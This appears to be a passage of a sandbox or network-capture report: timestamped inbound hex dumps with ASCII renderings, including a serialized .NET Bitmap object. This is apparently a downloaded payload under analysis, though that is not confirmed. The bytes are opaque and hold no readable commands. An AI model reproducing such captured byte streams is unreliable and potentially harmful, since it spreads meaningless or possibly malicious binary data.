2021-10-16 14:53:38 UTC	3593	IN	Data Raw: 8a cd 5f 6e 0f e1 9b e7 71 20 df 0f ef b9 ab 79 f9 91 db 8d 7f c2 0c 4e 9b 04 2f df 01 66 c3 6c b1 35 b2 ec 19 10 1d f0 8d 7b 3b 9c fb cb d3 e5 9a 44 20 88 e3 79 cf 8a 29 6a 9b 33 00 44 d7 5e 76 59 f4 f4 31 5e 9c db 02 ab 3f a7 cb 6e 28 b9 dd dc 23 56 c8 28 98 1f 6b 9d 76 9f 3b 3d 54 37 a7 21 53 30 49 1e 98 8f 7b 27 ae c8 a0 d4 52 64 71 5d 43 f7 c6 a1 8b 92 45 91 a0 66 a8 a5 35 20 0d 34 82 37 91 33 59 d1 04 9b 06 7e 7c 8a 35 15 1b 92 e8 bf 2e 98 0b 91 cf 80 5d d6 66 15 0d 22 bb e8 2c 36 c5 2b 22 4f 26 27 00 bd 60 eb 9b 53 7b 55 6c 73 ea dd 32 7b fe 76 5a 63 bb 44 a4 f8 24 9b 6f f0 d5 56 72 80 48 f0 43 02 0c 92 9e ed ad bc b0 0e 12 c2 94 d4 af f7 e3 90 7b 78 e2 ee 20 87 da dc c1 ce d6 eb ac 63 a0 7f 65 8f ae e0 0b 5f 76 61 9e 38 61 ca 19 7b d9 51 98 b2 ed Data Ascii: _nq yN/fl5{;D y)j3D^vY1^?n(#V(kv;=T7!S0I{'Rdq]CEf5 473Y~\|5.]f",6+"O&'`S{Uls2{vZcD$oVrHC{x ce_va8a{Q
2021-10-16 14:53:38 UTC	3601	IN	Data Raw: e6 ec 53 e1 43 33 8c c8 1c a2 0a da bb 1a ac cd a4 3a 70 d0 6d 4b 6e cd 20 9c 12 ea a8 a9 6b 76 13 6a 56 9e 51 14 8f a1 09 c4 fe 2c f5 5f 23 d5 7a 42 37 6e 9d 59 19 b5 c7 0f 98 53 99 51 f2 18 3d a6 ab 62 ab 0b 29 2c c3 48 46 bc d3 f2 cb 22 47 26 99 13 f2 fc 06 85 f1 4c bc e2 1c 9d ed 3c ca 42 73 d0 5c a2 19 58 e9 d3 f9 f0 93 c8 85 6a b9 06 8e 2a 60 b2 88 84 f4 2c 40 73 b3 54 5a 0b 47 57 df aa f0 70 de 70 7c 25 07 74 23 8f ce 3d 82 79 55 81 61 ec dc 93 58 7e 03 28 24 1d e1 d3 cb 12 47 fd a0 1a 70 30 86 14 be e5 4c 6e 7c dd ea 71 53 3c c1 70 e9 8d 17 f4 c6 67 7e 5f 3a 70 10 6b 1b f0 9f ef 73 08 35 16 35 e6 f7 d7 97 54 ea e4 ff 96 5d cf c4 7d 26 ff 11 3c 95 f2 63 2b f5 b5 42 5c 00 cd 9d f1 b8 bb 42 c0 4a 6c e4 26 48 ba 84 29 0e dc b7 87 1b 89 52 4b e7 6d 29 Data Ascii: SC3:pmKn kvjVQ,_#zB7nYSQ=b),HF"G&L<Bs\Xj*`,@sTZGWpp\|%t#=yUaX~($Gp0Ln\|qS<pg~_:pks55T]}&<c+B\BJl&H)RKm)
2021-10-16 14:53:38 UTC	3609	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3625	IN	Data Raw: 37 ad ba fc 69 cb 05 25 9e 30 a4 9e a7 2b db 53 f7 d5 ba 0e bf 37 8e 2c 12 b6 68 c5 e4 80 dc 63 50 7a 1e a9 c5 67 19 73 17 65 7f ba 34 f2 a2 73 a5 00 b2 4c 78 95 cf 0d 0f 00 00 00 00 e5 84 4a 32 3b ed e2 fc 3b da 94 89 ed e8 45 fd 64 f7 f3 af 90 c8 1e 7d e3 d9 32 ce 71 7b ee e8 10 50 67 ca 7f 92 f1 ec 9c 19 6e 40 b7 88 2a b4 90 12 7f 9a cd b5 4e 50 a1 23 81 85 a1 b0 bb 4b df 5b b3 0f b6 5f ff f8 ee 89 a1 f5 67 3f 32 8d d5 98 2b 93 cf 80 8c 28 eb ea 45 37 4c 46 9e 7e a1 fe 44 10 c6 60 a4 12 9b 2d b8 6c d5 75 f3 5e 62 b0 aa f0 7a 60 e5 2f 15 c2 ae bb 67 86 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 Data Ascii: 7i%0+S7,hcPzgse4sLxJ2;;Ed}2q{Pgn@*NP#K[_g?2+(E7LF~D`-lu^bz`/g@QSystem.Drawing, Version=4.0.0.0, Culture=ne
2021-10-16 14:53:38 UTC	3641	IN	Data Raw: c4 fd a0 15 25 ec c5 2b 0e 7f 1d 9e 4d 6f e5 ec 01 c0 a0 4e 07 ce e7 93 bf c3 c3 5b 09 06 4c 22 a3 54 e9 69 86 be e0 4f c1 6f 7f 02 53 84 ed 07 9b 6b f1 e6 dc 1c 0e 69 cc 27 f4 f0 0f 3e 3a ff fd 54 9d c7 e2 3f 57 6d fe 09 ce 17 6a cd a1 ca f2 13 4f 71 88 52 9d 16 d9 80 6f e5 13 5f 0c 56 75 e2 eb 9b 9f ff 14 ce 6b cb 64 54 e2 3c 77 eb 21 5d a8 d5 ee e0 00 56 4c 76 41 20 b2 5f d0 ae 18 5a 0a 3a 9b eb fa 11 1e bc b8 9d 44 b2 34 a6 52 d2 d2 e2 9f 4b 45 5e dc e1 58 47 e0 52 7f 77 d4 be b7 09 0d 53 90 47 5a c7 b5 19 37 a7 09 9f 4e 19 6e 9e f7 57 48 67 75 a8 15 d1 fc 89 6e c2 ea 55 45 15 33 cb 06 54 35 55 af 55 9b b7 54 94 76 58 68 89 9b 92 ce cb ce b0 cd b1 67 4a fc 79 68 56 58 81 4e 74 4b 11 0a 2f c1 ff 72 75 cc eb bf 08 5f 27 c5 a2 cb 9f 57 95 c8 74 8b a6 49 Data Ascii: %+MoN[L"TiOoSki'>:T?WmjOqRo_VukdT<w!]VLvA _Z:D4RKE^XGRwSGZ7NnWHgunUE3T5UUTvXhgJyhVXNtK/ru_'WtI
2021-10-16 14:53:38 UTC	3657	IN	Data Raw: e1 e2 fa 85 5a 28 16 2a 36 09 d0 9b 7a 2c 2f ee 4c bb cf 66 62 7d 24 ab 89 1c 4b b8 5a 90 95 39 40 64 79 89 e3 d3 65 5e 4a 76 00 db e9 0d 82 96 39 cc 94 ea dc 64 53 ed 14 c8 d4 c8 3c cb a0 da ef b7 3e 5b a7 71 87 7f 40 72 3e 54 dc e8 7a dc b7 f6 bd f6 a0 d8 6c 31 27 08 54 1b b9 d5 01 2c 8e 46 ca 39 2d 21 c3 8d 5b 95 dc 22 97 87 04 84 4d f9 23 b8 65 6b af 8c 4d 90 68 10 94 6b d2 21 a9 41 85 4b 9b 52 2f 49 14 58 8e e3 26 50 7a 21 8a 11 9c a3 af 22 60 cf d7 c9 28 19 4a 56 36 b3 02 5d 6a 32 8f d9 eb ec 20 ef b8 7b e8 c2 23 d6 e9 0e d7 07 e6 5b 5b 98 4d 2a 51 4e e5 6a b2 82 f9 e8 a4 7f 4f c9 16 ed f5 6e ff 13 55 28 54 fb 4c b6 f7 c9 fb 2f 39 91 a6 0a 36 7d d4 38 8e 60 c0 02 97 dd 77 be c8 ac 04 4a f9 9f 04 c8 6f 74 1f 75 07 58 f3 a7 f3 ef 83 3b cb 01 8f ac 06 Data Ascii: Z(6z,/Lfb}$KZ9@dye^Jv9dS<>[q@r>Tzl1'T,F9-!["M#ekMhk!AKR/IX&Pz!"`(JV6]j2 {#[[MQNjOnU(TL/96}8`wJotuX;
2021-10-16 14:53:38 UTC	3673	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3689	IN	Data Raw: 55 25 48 cb 92 f9 23 a2 9a 86 4c 54 56 21 fe f3 13 15 75 31 14 4f 43 f9 0c fd 5c a4 5a b5 92 e4 dd 8c 8a 8f 6a 95 54 46 9f 54 a9 14 0c e3 b9 e7 7e 5d 23 d4 32 a3 69 6e cd f7 fd 5d ca 69 b6 a4 7e 10 be 0f 44 8c ff 64 67 05 da 99 47 81 ec ac e5 79 39 5b 32 a9 9d f6 6a 78 d9 0a d0 60 26 54 f4 83 d0 e9 24 7c d9 f2 fa c8 99 a4 91 84 2e db 7e 14 e1 13 71 25 d7 92 42 ea 9a 76 ca 1f 3f f5 0a c6 de 3a 37 78 8d 6e 9c 28 89 90 c0 7d 72 ee df de dc d6 01 f3 ac a4 f4 76 9e 40 7f 0e e9 dd e4 52 f0 fa c8 91 6a a3 ae 83 59 b1 71 95 35 35 89 2c ff 35 a2 1e de 14 22 97 82 b7 1d 0b eb 44 65 9d 93 50 1d fd 19 77 d5 a5 54 0f 4e 22 a5 52 c9 39 7f d4 e3 f2 c5 b8 18 d3 6d c6 43 fc bc 9d 5d c2 72 68 74 08 53 f4 77 31 bc 5b 68 f8 c8 77 b0 9f e5 d5 6d 76 fd 42 47 47 53 fb f6 5e 88 Data Ascii: U%H#LTV!u1OC\ZjTFT~]#2in]i~DdgGy9[2jx`&T$\|.~q%Bv?:7xn(}rv@RjYq55,5"DePwTN"R9mC]rhtSw1[hwmvBGGS^
2021-10-16 14:53:38 UTC	3705	IN	Data Raw: 3d f6 51 81 94 a2 2a 7c fb ea 9e 46 96 75 a8 51 c8 b7 16 51 49 fd bb ee 83 00 66 7e da 69 34 8f aa 14 a8 28 1c 1e a8 2d 30 30 61 5a 2a f8 4e c1 98 15 f6 8a fd 87 4e 87 f3 26 ba 18 0f 2c d8 67 b9 80 8d 65 fc 70 6f 8c 5e 6e 8e be c9 9d 17 40 ee a6 fb f6 f2 58 cc 36 b0 f8 95 a1 6b c7 7c 23 f8 d4 cb a1 d2 46 90 85 3f bf c0 70 53 92 a6 c8 8e c9 5c 75 3b f1 7f 14 a0 d1 bc 1b 6b d1 28 49 0c 7c d8 ce 7c cf e1 d0 48 a7 45 b7 f0 5f 95 15 07 6a f6 67 d9 89 aa 1d ce ee ac 7e 64 e0 35 ba 45 ca d0 6e c3 3c 2c 90 e3 0f c5 fc c1 2f 44 b9 ff c3 57 c8 15 42 da b9 3e c7 11 f1 cc 74 29 58 c5 f3 04 c6 06 92 b7 d9 77 10 d0 8f 05 9e d4 fe 4b eb 97 3e ac 4c d2 10 e6 b7 09 4b e4 25 06 63 8d 87 10 98 34 d2 3c 54 14 e8 e9 fc 98 90 34 70 ca 2d e1 d9 dd 53 35 03 33 e1 5e 60 e7 9b c1 Data Ascii: =Q\|FuQQIf~i4(-00aZNN&,gepo^n@X6k\|#F?pS\u;k(I\|\|HE_jg~d5En<,/DWB>t)XwK>LK%c4<T4p-S53^`
2021-10-16 14:53:38 UTC	3721	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3737	IN	Data Raw: 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:38 UTC	3753	IN	Data Raw: 1d e7 a9 e3 3a b8 3d b7 90 f9 ee fa 75 d7 0f 35 f2 32 68 c3 ce f5 b9 05 35 59 6b ed 03 5b f8 93 c7 2a b9 07 3c f0 eb 27 f3 fc f7 a4 ed e4 5e 2b 39 d1 68 7f 01 6d 93 24 39 7f 8e 1c ce bc c0 68 08 e1 a7 d1 f2 9e fc f7 28 55 ca 6b c6 94 3c e4 b5 bd ec 4d a9 54 a6 33 df cd 8c 46 bd 46 c4 86 f0 c4 a5 b6 16 3a f4 e9 cc 55 ce 58 2f 46 e8 c6 4a fb 53 f6 e6 0f 6b 58 c4 e0 8e 2d b3 c1 a3 9a 18 4d 91 f6 04 02 04 bf fa ba 1d dc 1b 53 35 1d 48 7b ce 52 27 20 ea c1 e3 14 f7 08 4b ee f7 bd 3b 19 7a 92 39 0b 3d 2b ff b1 d2 7e 3c fd bd 7b 57 70 40 72 98 20 27 fe 3d 03 35 0b f9 3f f4 51 f3 e8 96 10 56 8f b8 ce e5 c1 8c ed c9 44 35 89 78 01 05 ca fc 08 93 22 66 28 45 ec bb f5 e1 37 a7 55 15 ae bb 62 cf b3 f6 c7 6a c9 0d 1b dd 75 0c c7 c5 c3 42 65 25 c3 8c 3a a0 a5 18 b5 7d Data Ascii: :=u52h5Yk[*<'^+9hm$9h(Uk<MT3FF:UX/FJSkX-MS5H{R' K;z9=+~<{Wp@r '=5?QVD5x"f(E7UbjuBe%:}
2021-10-16 14:53:38 UTC	3769	IN	Data Raw: 10 80 8c 6a b4 a2 55 ce 3a 63 45 52 96 a1 a0 55 ba f7 98 23 b5 39 f2 05 ee 2d 0c 88 f7 43 6c 8d c4 8e e2 13 82 1d b5 bd 3c c8 3e 04 2d ae 04 c5 34 64 a6 d9 d2 86 2c 90 c9 44 11 e9 13 59 99 90 a8 9b 7e ef 6c 1e f5 45 35 ba a1 2d e0 66 98 cc 85 52 72 b6 d1 fd 09 0c 92 90 35 38 59 a1 4c fa d6 c6 02 1a f8 17 fc 15 c2 3e e9 2f f7 2d c8 42 c5 2b 05 f8 a1 e7 08 de 67 60 62 4c fb a6 8a 8a 70 3a 19 24 73 d2 b3 63 73 1c 4e b1 f2 11 a5 a8 62 df 74 9a 88 fd 55 02 a7 d5 99 37 96 2e d7 92 5b 24 32 4a c8 ca 78 f3 de 80 81 d1 24 f0 6c 91 8d 94 73 d8 45 52 86 7e c9 7f 27 e2 c6 4f 82 b9 34 fb 60 e1 34 03 8e 61 82 00 6f d1 f9 52 a8 a7 db 72 2d 8d 83 f8 d1 fd 99 5e c4 1e 33 d1 1a 78 e1 e9 37 5f 86 05 04 2d 9b 72 e6 90 b7 39 36 08 e4 d2 5f b9 7f 1d a6 47 f5 dd 5f 79 7e 20 b6 Data Ascii: jU:cERU#9-Cl<>-4d,DY~lE5-fRr58YL>/-B+g`bLp:$scsNbtU7.[$2Jx$lsER~'O4`4aoRr-^3x7_-r96_G_y~
2021-10-16 14:53:38 UTC	3785	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3801	IN	Data Raw: 78 85 5c 8b 32 71 b2 15 75 58 09 69 35 85 b5 25 25 1e 6e ee 20 13 0d 46 dc ea aa 6f 67 8c 3b ce 2f 00 3b 58 f9 f9 e2 2b 8b 5c f9 db b8 8f bb 22 4a 63 48 bf e2 36 62 10 f4 52 36 12 12 c1 fa b8 43 00 02 9d cc 39 e4 a6 ce 9d c9 4f 72 2f 8d e9 7e 7e d1 84 7f c9 dc ed 45 34 77 14 a8 21 05 bc bf d3 02 c1 9d c3 51 d7 e0 b8 2f c4 9c 10 c0 5b b4 d4 78 89 a9 46 0e 3c 6f 84 36 08 02 8f 67 2e 8a 37 50 b4 79 f5 c7 c6 95 0e 3a 92 75 6c 7e 1b 97 14 ef e5 66 c3 f9 76 4e 10 ba 66 0c 70 12 fc 6a e7 26 84 53 db fe f9 72 44 aa 75 04 c7 4f 5d 32 c6 9b 0a 45 5f f8 d4 ff 34 d3 5d 55 45 4f 21 a7 21 d7 c5 7e 66 b3 cb db b1 e4 67 0e 12 60 1d 90 97 1f cb e7 8d 5a b7 6d ef 30 98 eb 1f 43 bd 6e 8e 49 f5 7a ae 1d c0 34 14 0b d9 1c 0c 18 29 4d b2 13 5e af 95 e2 40 92 9c 90 48 7b 93 49 Data Ascii: x\2quXi5%%n Fog;/;X+\"JcH6bR6C9Or/~~E4w!Q/[xF<o6g.7Py:ul~fvNfpj&SrDuO]2E_4]UEO!!~fg`Zm0CnIz4)M^@H{I
2021-10-16 14:53:38 UTC	3817	IN	Data Raw: 94 de c6 ef 89 08 88 c0 e3 91 6c 25 9a ba c5 56 dc a1 6a 4a a8 a1 d5 60 f7 fb a5 a3 0c dd 48 7b a1 43 a1 43 a6 00 fa d4 07 3e 85 7c 31 68 e5 de c3 fb 54 6a ac 41 5c b9 43 63 bd ce 38 f5 01 d0 62 df ef 55 03 7e e3 60 a6 fb ea 18 c4 91 f7 30 a4 6f 0e 68 52 da f2 21 40 b3 8b 2c d9 67 f4 c7 a0 76 d0 c4 0f 19 00 b0 71 7c 45 81 e9 2e 5f ee c2 a1 cc 8f 5a 6b 90 9f f6 b1 34 3f da bb 8b c4 2b 26 e2 62 98 bd ff 36 7d 59 84 be 46 d6 84 5d 4e 22 4a 0a 3e 8c b1 4c a4 23 72 2f fd 39 49 f0 f1 84 7d 67 70 5c 25 84 a8 e4 6b ec 43 37 3c 94 2c 48 6d 6f 4c f6 44 1d 75 1f 65 15 3c df b0 11 4a ed 00 c0 26 1e 73 78 e2 4a 06 00 7b 3f 73 95 bb ba b8 76 31 b5 21 4a 04 d7 18 c9 00 95 d2 96 3a ef 59 8f 17 ad 3a 2f 24 7d 80 3a 04 dd fc 2c f2 cc 49 e2 ac 0d d9 b3 06 c8 c9 57 18 be fa Data Ascii: l%VjJ`H{CC>\|1hTjA\Cc8bU~`0ohR!@,gvq\|E._Zk4?+&b6}YF]N"J>L#r/9I}gp\%kC7<,HmoLDue<J&sxJ{?sv1!J:Y:/$}:,IW
2021-10-16 14:53:38 UTC	3833	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 52 7e f9 9f 4d a6 e0 8e cf 7c 3d 07 12 d8 99 91 57 b3 39 1a 9f f7 1f 1a df c1 2b 57 08 d8 4e 2b 20 0b 21 9a ee 89 65 2e d3 79 f8 5d 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: mR~M\|=W9+WN+ !e.y]f
2021-10-16 14:53:38 UTC	3849	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3865	IN	Data Raw: 39 58 87 ec df b1 ef 16 f4 80 90 1a b6 ef 46 1c a1 8f a9 f9 21 ef c3 12 68 97 c3 1a 42 69 69 e6 72 84 23 53 eb 42 bc 3a 09 80 fe c7 b0 71 fb 05 9c 3f a5 6c 84 d1 ba 70 06 0a fb c9 41 f3 4f 4b d6 50 1a 3e e1 8b dc b9 df 86 aa 26 1e 47 5e a7 b8 ff ce 3b 8c 10 18 6a 61 03 f2 62 4a 6e 1f 66 30 92 7e 18 f0 97 11 b6 05 81 b0 d1 40 21 0f 2b 22 30 06 8b ef 33 66 b9 07 cd fc 4e d3 93 d0 9f 8a bf f9 88 33 da 32 8f 9e c3 0c 38 21 97 d7 3f 9c 67 0a 27 f7 df ce d8 d4 5a 6c 0d d7 f8 79 6a b1 91 a1 1a 6c 6b 39 c3 05 52 6d 7d ab c2 53 33 0e 97 9a 43 74 6e df 4a ce cd f6 d3 2a 2b 77 27 21 38 5a 28 b2 d7 93 2b a7 ce 67 6a d8 ce a3 5f 67 bc be 73 ee a5 38 ad 92 48 92 06 9f cc 4b 10 37 a0 dc 20 de 2b 31 03 cd a0 eb 3f 0c 15 07 c3 90 51 d4 cd e8 d3 0b 08 9f ea f6 04 2e ab 23 Data Ascii: 9XF!hBiir#SB:q?lpAOKP>&G^;jabJnf0~@!+"03fN328!?g'Zlyjlk9Rm}S3CtnJ*+w'!8Z(+gj_gs8HK7 +1?Q.#
2021-10-16 14:53:38 UTC	3881	IN	Data Raw: de c6 c2 3b 93 ff 38 f6 2d cb 3a 7b 4a 70 f4 f6 45 60 bf f4 6c 1a ea 18 d4 fe 04 ef f0 fe 64 ea d9 5f 81 14 f5 c2 94 73 81 cb 25 10 ff ca 4f 8d 47 90 9a 3d 5c 92 62 93 36 c2 d1 e2 3a 4a e7 d8 97 b1 8e a8 12 a0 14 36 55 d7 a4 d4 70 9e 49 91 b0 c1 17 3d 41 2b 95 52 91 7a 0e c7 51 01 ac a8 a8 d6 ee 26 ef 40 98 d3 46 66 44 9a e8 04 62 52 50 49 74 09 d9 5d 8a ec 1d e8 2d 1f f7 f0 2b 1c da b2 f6 71 30 06 0b 2e 1f 18 d2 09 d1 b5 69 b3 7f 1d 77 1b 86 ea 5a 81 a1 41 95 7c e6 da bb 83 7a b3 c9 30 e3 c5 aa a0 bd e5 de 04 da 29 4e a7 33 8e 07 c2 c0 2c f4 1c 34 5d ca 17 15 0d 2f cd ec 79 f2 9d f8 d1 59 10 3c b6 4d 9c 24 2d f2 fd 47 19 1c 76 a1 35 c8 12 11 34 56 e4 d6 d8 1c b1 56 d5 74 2f ae bb f2 19 0f 17 4a a1 1c ac df b5 4c f6 82 c3 df 80 75 59 d9 dc ed a2 36 e6 05 Data Ascii: ;8-:{JpE`ld_s%OG=\b6:J6UpI=A+RzQ&@FfDbRPIt]-+q0.iwZA\|z0)N3,4]/yY<M$-Gv54VVt/JLuY6
2021-10-16 14:53:38 UTC	3897	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3913	IN	Data Raw: 00 2c 65 fd 0f ac 86 f7 8f 08 50 9f 3d 0b d2 68 ab a1 00 c3 a4 50 40 03 dc db 1e 84 4a 8c 80 00 3d a4 8b ea b0 05 5c 7c 2b 52 30 89 1a d9 be 58 1c 11 59 c0 8e f9 9a 2d bc 1a 3f 98 8b fa 90 02 a5 1d cf bf ec 09 04 5e 5d e4 16 7f 88 65 77 fd 5f cd d9 d8 f1 4a 3f ba d7 0d 66 a6 42 11 c1 07 d2 0d c5 2a a7 fd b5 07 ff 53 be 0e 0f 4a 86 d2 70 5d 6c 48 99 02 a4 8f 00 42 01 58 9f fd 5d 24 34 9d 32 fb 08 3b 94 88 d4 50 06 32 1c 23 b5 2f 84 0e b3 11 61 e5 d9 6c 68 a8 9f ce 2f e3 04 5d d1 72 55 4a 3a d5 29 89 99 8e 90 e7 c4 15 ee a9 7c 2a 7d 4b dc bc 12 9c ba cc 5a 8f d1 83 e1 a1 2e be e8 21 87 be f3 33 74 40 03 34 66 80 ec 0e d4 dd 6b 08 d8 85 5e d4 c8 40 77 b3 f1 1c 11 e7 b3 1a 14 64 91 20 fb 5b f0 ed 8f 8c 73 b9 30 c1 19 6c 27 68 eb 27 03 6a 59 07 ee e7 27 43 a1 Data Ascii: 